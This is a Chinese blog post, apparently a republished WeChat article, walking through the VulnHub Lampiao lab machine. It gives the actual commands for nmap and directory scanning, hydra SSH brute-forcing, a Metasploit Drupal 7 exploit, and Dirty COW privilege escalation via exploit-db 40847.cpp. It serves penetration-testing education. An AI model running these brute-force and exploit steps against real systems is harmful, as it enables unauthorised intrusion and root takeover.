vulnhub靶场【Lampiao靶机】,提权之脏牛提权

admin 2025年1月20日13:35:15评论9 views字数 2872阅读9分34秒阅读模式

前言

靶机:lampiao,IP地址为192.168.10.11

攻击:kali,IP地址为192.168.10.2

都采用虚拟机,网卡为桥接模式

该靶机目前只剩下一个了,之前记得是有两台构成系列的。

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者在本公众号回复lampiao

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

信息收集

使用nmap扫描端口

nmap -sV -O 192.168.10.11 -p-
vulnhub靶场【Lampiao靶机】,提权之脏牛提权
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

进一步构造语句测试

nmap -sV -O 192.168.10.11 -p 22,80,1898 -sC
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

网站信息探测

访问80端口,这给出的相当于提示,页面源代码中也并未有其他内容

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

访问1898端口,之气在使用nmap的默认脚本扫描,发现一些内容,进行验证测试

通过访问查看后,发现的图标以及登录界面。再使用wappalyzer插件识别出确实是drupal 7

这个插件可以通过浏览器插件下载,各个浏览器都有

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

使用whatweb也是识别出

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

使用gobuster爆破目录

gobuster dir -u http://192.168.10.11:1898 -w /usr/share/wordlists/dirb/big.txt -x php,bak,txt,js,html -b 403-404
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

再使用dirsearch其默认字典试试

dirsearch -u http://192.168.10.11:1898 -x 403,404 -e zip,gz
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

访问robots.txt,其中包含甚多

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

测试多个,访问也只发现版本7.54

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

漏洞寻找

在主页发现一个文章,有点东西

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

点击查看,发现http的请求,是在robots.txt中不允许的访问

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

那么就访问node/2进行测试,发现两个文件,并且还有提示,应该是隐写

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

直接构造链接测试访问

http://192.168.10.11:1898/audio.m4a
http://192.168.10.11:1898/qrc.png

#
下面的是/node/3下的文件
http://192.168.10.11:1898/LuizGonzaga-LampiaoFalou.mp3

其中一个音频,一个二维码,下载到kali中进行测试

对于二维码,可以通过在线网站解析有无隐藏内容,或者通过命令zbarimg,可直接在kali通过apt下载即可使用,获取到信息Try harder! muahuahua

zbarimg qrc.png
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

测试上面的audio.m4a文件,并非隐写,而是直接语音读出user:tiago,则,这个信息就是在主文章界面中的文章作者

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

获取shell

爆破ssh获取shell

不过两个文章,这里通过音频给出,就测试这一个用户,先使用cewl爬取网站,生成一个字典,用于爆破该用户,如果不行,再换字典

cewl http://192.168.10.11:1898 -w pass.txt -m 3

这里有两个地方可以测试,一个是网站的登录,一个是ssh的连接

在使用hydra测试爆破网站登录时,发现结果是有了,但是登录不成功

这里的登录时的表单数据,是通过浏览器抓取的

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

那么再测试ssh一下,获取到密码Virgulino

hydra -l tiago -P pass.txt 192.168.10.11 ssh
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

以这个进行测试登录,发现可以成功登录

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

CMS漏洞获取shell

或者通过searchsploit搜索有无对应的版本漏洞进行测试,也就是druapl的漏洞

searchsploit drupal 7.54

发现有,但是大部分都是借助msf的,这里启动msf,毕竟这个工具还是要会使用的

msfconsole
search drupal 7
use 1
vulnhub靶场【Lampiao靶机】,提权之脏牛提权
options
set rhosts 192.168.10.11
set rport 1898
run
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

靶机内信息收集

首先这里可以两种登录,一直是通过msf反弹的www-data,一种是ssh爆破的tiago用户

使用find寻找具有SUID权限的文件,发现sudo,测试发现sudo没有可用

find / -perm -4000 -print 2>/dev/null
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

切换之前ssh登录的,测试,也是没有sudo

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

查看定时任务,网络状态、进程等等信息,最好可以上传pspy64进行检测

cat /etc/crontab
ls -l /etc/cron.d
vulnhub靶场【Lampiao靶机】,提权之脏牛提权
ss -antlp
ip add
vulnhub靶场【Lampiao靶机】,提权之脏牛提权
ps -aux
top
df -h

收集内核信息和操作系统信息

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

提权

使用searchsploit搜索有无内核版本提权漏洞,发现有几个合适的,需要进一步进行测试

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

在靶机内使用gcc -v测试,发现靶机内可以使用gcc,那么可以把c文件通过pythonwget等搭配,不过测试发现,不行,把在kali编译好的文件,上传到靶机去执行,也是不可以的。

是提权脚本不对吗,上传一个脚本检测[linux-exploit-suggester.sh]

项目地址https://github.com/The-Z-Labs/linux-exploit-suggester

执行脚本./les.sh,发现几个分析很有可能的提权,不过测试前三个发现不行,不过这里发现脏牛提权,啧,ai搜索一下

  • 一般来说,内核版本在 3.13 到 4.8 之间的 Linux 系统都可能存在风险,Ubuntu 14.04 默认使用的是 3.13.x 系列内核,在未打补丁前是受影响的。
  • 虽然脏牛漏洞主要影响特定的内核版本,但它利用的是内核的内存管理机制中的一个相对通用的特性。许多内核版本可能都采用了相似的内存管理和写时复制机制,只是在细节上有些许差异。即使不是完全相同的内核版本,只要这些内核使用了类似的内存管理代码和逻辑,就有可能受到影响。
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

使用searchsploit进一步进行测试,因为这个漏洞搜索,就是根据exploit漏洞库的

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

经测试,发现只有40847.cpp是可用的,因为我该测试都测试了

可以查看这个脚本,其中有用法

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow -s
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

那么这时候测试,发现靶机内可以使用g++,把文件下载到靶机内,这里采用ssh连接后的用户tiago,采用scp传输,在kali中执行

scp 40847.cpp [email protected]:/tmp
vulnhub靶场【Lampiao靶机】,提权之脏牛提权

然后执行上面的用法即可

vulnhub靶场【Lampiao靶机】,提权之脏牛提权

总结

该靶机考察以下几点:

  1. 对于博客型网站,可能作者在编写时存在信息泄露,或者说对于参数设置不当,导致可以通过设置参数发现隐藏信息

  2. 对于msf的使用,当发现网站CMS的版本信息等时,可以测试一下有无版本漏洞

  3. 对于靶机内的系统信息,当发现版本信息及内核版本后,使用searchsploit搜索,当都测试发现无可利用时,适当的放宽条件,比如只指定内核信息,或者只指定操作系统信息等。

    或者借助工具进行自动化的审计,当发现适合的提权方式后,就可以进行一个个的测试

原文始发于微信公众号(泷羽sec-何生安全):vulnhub靶场【Lampiao靶机】,提权之脏牛提权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月20日13:35:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶场【Lampiao靶机】,提权之脏牛提权https://cn-sec.com/archives/3645635.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息